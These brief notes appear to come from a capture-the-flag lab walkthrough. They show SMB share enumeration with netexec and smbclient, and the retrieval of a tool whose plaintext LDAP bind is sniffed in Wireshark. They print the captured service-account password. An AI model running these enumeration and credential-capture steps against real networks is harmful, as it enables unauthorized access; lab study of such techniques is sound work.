445

$ netexec smb 10.10.11.174 -u 'adot8' -p '' --shares

smbclient "\\\\10.10.11.174\\support-tools" -U 'adot8' -N
smb: \> prompt off
smb: \> recurse on
smb: \> mget *

unzip UserInfo.exe.zip

$ cat UserInfo.exe.config

Dotnet framework installed means I can run executables

Open wireshark and listen on tun0. The LDAP query will be sent in plain text

support\ldap.$nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

Last updated 1 year ago